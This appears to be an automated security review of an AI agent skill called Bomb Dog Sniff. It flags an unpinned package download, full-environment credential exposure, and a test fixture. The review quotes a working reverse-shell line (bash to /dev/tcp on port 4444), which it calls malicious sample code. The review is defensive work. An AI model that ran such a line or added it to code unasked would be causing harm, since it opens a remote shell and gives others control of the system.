Bomb Dog Sniff
Analysis
Bomb Dog Sniff appears to be a coherent security scanner, but its safe-install path can modify installed skills while running an unpinned external ClawHub package with the user's full environment.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
Checks for instructions or behavior that redirect the agent, misuse tools, execute unexpected code, cascade across systems, exploit user trust, or continue outside the intended task.
const child = spawn('npx', ['clawhub@latest', 'download', sanitizedName, skillPath], {The safe-install path executes a package selected by the moving `latest` tag at runtime. Because this path is used to download skills that may then be installed, an unpinned helper package is a material supply-chain risk.
Download from clawhub/GitHub, scan, and install only if safe.
Installing skills is central to the stated purpose and is disclosed, but it is still high-impact because it changes the agent's installed capabilities.
exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");The package includes runnable malicious sample code in a test-fixture path. That appears purpose-aligned for scanner testing, but it would be dangerous if executed directly.
Checks whether tool use, credentials, dependencies, identity, account access, or inter-agent boundaries are broader than the stated purpose.
env: { ...process.env, NODE_NO_WARNINGS: '1' },The external ClawHub downloader subprocess receives the entire environment even though the registry declares no required environment variables or primary credential. Environment variables often contain unrelated API keys, tokens, or account configuration.
